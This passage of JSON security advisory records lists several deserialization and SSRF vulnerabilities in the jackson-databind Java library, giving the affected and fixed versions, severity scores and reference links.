"2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.10.5", "2.9.10.6", "2.9.10.7", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9m6f-7xcq-8vf8/GHSA-9m6f-7xcq-8vf8.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-9m6f-7xcq-8vf8/GHSA-9m6f-7xcq-8vf8.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-36183" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/3003" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/12e23c962ffb4cf1857c5461d72ae54cc8008f29" }, { "type": "WEB", "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210205-0005" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2021-03-18T23:27:59Z", "nvd_published_at": "2021-01-07T00:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9mxf-g3x6-wv74", "published": "2019-01-04T19:07:06Z", "modified": "2024-03-14T05:33:39.459890Z", "aliases": [ "CVE-2018-14721" ], "summary": "Server-Side Request Forgery (SSRF) in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.7" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-9mxf-g3x6-wv74/GHSA-9mxf-g3x6-wv74.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-9mxf-g3x6-wv74/GHSA-9mxf-g3x6-wv74.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-9mxf-g3x6-wv74/GHSA-9mxf-g3x6-wv74.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-14721" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2097" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-9mxf-g3x6-wv74" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.7" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:29:04Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9vvp-fxw6-jcxr", "published": "2020-05-15T18:58:47Z", "modified": "2024-03-15T01:01:13.767060Z", "aliases": [ "CVE-2020-11113" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-9vvp-fxw6-jcxr/GHSA-9vvp-fxw6-jcxr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11113" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2670" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/08fbfacf89a4a4c026a6227a1b470ab7a13e2e88" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e2ba12d5d60715d95105e3e790fc234cfb59893d" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-23T19:31:52Z", "nvd_published_at": "2020-03-31T05:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c265-37vj-cwcc", "published": "2020-06-18T14:44:48Z", "modified": "2024-06-25T14:18:28.499070Z", "aliases": [ "CVE-2020-14062" ], "summary": "Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c265-37vj-cwcc/GHSA-c265-37vj-cwcc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14062" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2704" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/840eae2ca81c597a0010b2126f32dce17d384b70" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/99001cdb6807b5c7b170ec6a9092ecbb618ae79c" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:06:04Z", "nvd_published_at": "2020-06-14T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c2q3-4qrh-fm48", "published": "2020-06-18T14:44:50Z", "modified": "2024-02-17T05:36:21.468281Z", "aliases": [ "CVE-2020-14061" ], "summary": "Deserialization of untrusted data in Jackson Databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.10.4", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c2q3-4qrh-fm48/GHSA-c2q3-4qrh-fm48.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14061" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2698" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/5c8642aeae9c756b438ab7637c90ef3c77966e6e" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200702-0003" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-18T13:06:14Z", "nvd_published_at": "2020-06-14T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c8hm-7hpq-7jhg", "published": "2019-01-04T19:07:03Z", "modified": "2024-03-15T01:17:19.251183Z", "aliases": [ "CVE-2018-19362" ], "summary": "com.fasterxml.jackson.core:jackson-databind vulnerable to Deserialization of Untrusted Data", "details": "FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the jboss-common-core class from polymorphic deserialization.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.8" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/01/GHSA-c8hm-7hpq-7jhg/GHSA-c8hm-7hpq-7jhg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19362" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2186" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/72cd4025a229fb28ec133235003dd4616f70afaa" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff8dcfe29377088ab655fda9d585dccd5b1f07fabd94ae84fd60a7f8@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00005.html" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-c8hm-7hpq-7jhg" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/TINKERPOP-2121" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3@%3Cdevnull.infra.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107985" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:30:35Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cf6r-3wgc-h863", "published": "2020-05-15T18:58:58Z", "modified": "2024-02-18T05:32:56.325249Z", "aliases": [ "CVE-2019-14892" ], "summary": "Polymorphic deserialization of malicious object in jackson-databind", "details": "A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5, and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-cf6r-3wgc-h863/GHSA-cf6r-3wgc-h863.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", 